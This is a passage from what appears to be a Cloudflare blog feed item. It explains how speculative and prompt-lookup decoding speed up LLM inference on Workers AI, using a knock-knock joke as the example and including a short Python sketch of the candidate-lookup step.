    <p>One new inference strategy we’ve implemented is speculative decoding, a popular way to increase throughput (measured in tokens per second). LLMs work by predicting the next expected token (a token can be a word, word fragment, or single character) in the sequence with each call to the model, based on everything the model has seen before. For the first token generated, this means just the initial prompt, but after that each subsequent token is generated based on the prompt plus all tokens generated so far. Typically, this happens one token at a time, generating a single word, or even a single letter, depending on what comes next.</p><p>But what about this prompt:</p><blockquote><p><i>Knock, knock!</i></p></blockquote><p>If you are familiar with knock-knock jokes, you could very accurately predict more than one token ahead. For an English language speaker, what comes next is a very specific sequence that is four to five tokens long: “Who’s there?” or “Who is there?” Human language is full of these types of phrases where the next word has only one, or a few, high probability choices. Idioms, common expressions, and even basic grammar are all examples of this. So for each prediction the model makes, we can take it a step further with speculative decoding to predict the next <i>n</i> tokens. This allows us to speed up inference, as we’re not limited to predicting one token at a time.</p><p>There are several different implementations of speculative decoding, but each in some way uses a smaller, faster-to-run model to generate more than one token at a time. For Workers AI, we have applied <a href="https://github.com/apoorvumang/prompt-lookup-decoding"><u>prompt-lookup decoding</u></a> to some of the LLMs we offer. This simple method matches the last <i>n</i> tokens of generated text against earlier text in the prompt and output, and proposes the tokens that followed those matches as candidates for continuing the output. 
In the case of knock-knock jokes, it can predict all the tokens for <i>“Who’s there?”</i> at once after seeing “<i>Knock, knock!</i>”, as long as this setup already occurs somewhere in the prompt or previous dialogue. Once these candidate tokens have been predicted, the model can verify them all with a single forward pass and choose to either accept or reject them. This increases the generation speed of llama-3.1-8b-instruct by up to 40% and the 70B model by up to 70%.</p><p>Speculative decoding has tradeoffs, however. Typically, the results of a model using speculative decoding have a lower quality, both when measured using benchmarks like <a href="https://paperswithcode.com/dataset/mmlu"><u>MMLU</u></a> and when compared by humans. More aggressive speculation can speed up sequence generation, but generally comes with a greater impact to the quality of the result. Prompt lookup decoding offers one of the smallest overall quality impacts while still providing performance improvements, and we will be adding it to some language models on Workers AI, including <a href="https://developers.cloudflare.com/workers-ai/models/llama-3-8b-instruct"><u>@cf/meta/llama-3.1-8b-instruct</u></a>.</p><p>And, by the way, here is one of our favorite knock-knock jokes; can you guess the punchline?</p><blockquote><p><i>Knock, knock!</i></p><p><i>Who’s there?</i></p><p><i>Figs!</i></p><p><i>Figs who?</i></p><p><i>Figs the doorbell, it’s broken!</i></p></blockquote>
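<p>The candidate-proposal step of prompt-lookup decoding can be sketched as follows. This is a simplified illustration (the real implementation linked above operates on token ids inside the sampling loop): search earlier text for the most recent occurrence of the last <i>n</i> tokens, and propose the tokens that followed it as speculative candidates for the model to verify. The function name and parameters are our own.</p>

```python
def propose_candidates(tokens, ngram_size=2, num_candidates=3):
    """Propose up to num_candidates speculative next tokens by matching the
    trailing ngram against earlier occurrences in the prompt/output."""
    if len(tokens) < ngram_size:
        return []
    tail = tokens[-ngram_size:]
    # Scan right-to-left so the most recent matching context wins.
    for start in range(len(tokens) - ngram_size - 1, -1, -1):
        if tokens[start:start + ngram_size] == tail:
            follow = tokens[start + ngram_size:start + ngram_size + num_candidates]
            if follow:
                return follow
    return []
```

<p>Given the token sequence for a second “<i>Knock, knock!</i>”, this lookup finds the earlier occurrence and proposes the tokens of “<i>Who’s there?</i>” in one shot; the model then accepts or rejects them with a single forward pass.</p>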
    <div>
      <h2>Keep accelerating</h2>
      <a href="#keep-accelerating">
        
      </a>
    </div>
    <p>As the AI industry continues to evolve, there will be new hardware and software that allows customers to get faster inference responses. Workers AI is committed to researching, implementing, and rolling out these upgrades to our services to help you get fast inference. As an Inference-as-a-Service platform, you benefit from every optimization we apply, without having to hire your own team of ML researchers and SREs to manage inference software and hardware deployments.

We’re excited for you to try out these new releases and let us know what you think! Check out our full suite of AI announcements <a href="https://blog.cloudflare.com/tag/ai/"><u>here</u></a>, and visit the <a href="https://developers.cloudflare.com/workers-ai/"><u>developer docs</u></a> to get started.</p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[LLM]]></category>
            <guid isPermaLink="false">29PAMer5L0do12OtNa557I</guid>
            <dc:creator>Isaac Rehg</dc:creator>
            <dc:creator>Jesse Kipp</dc:creator>
        </item>
    </channel>
</rss>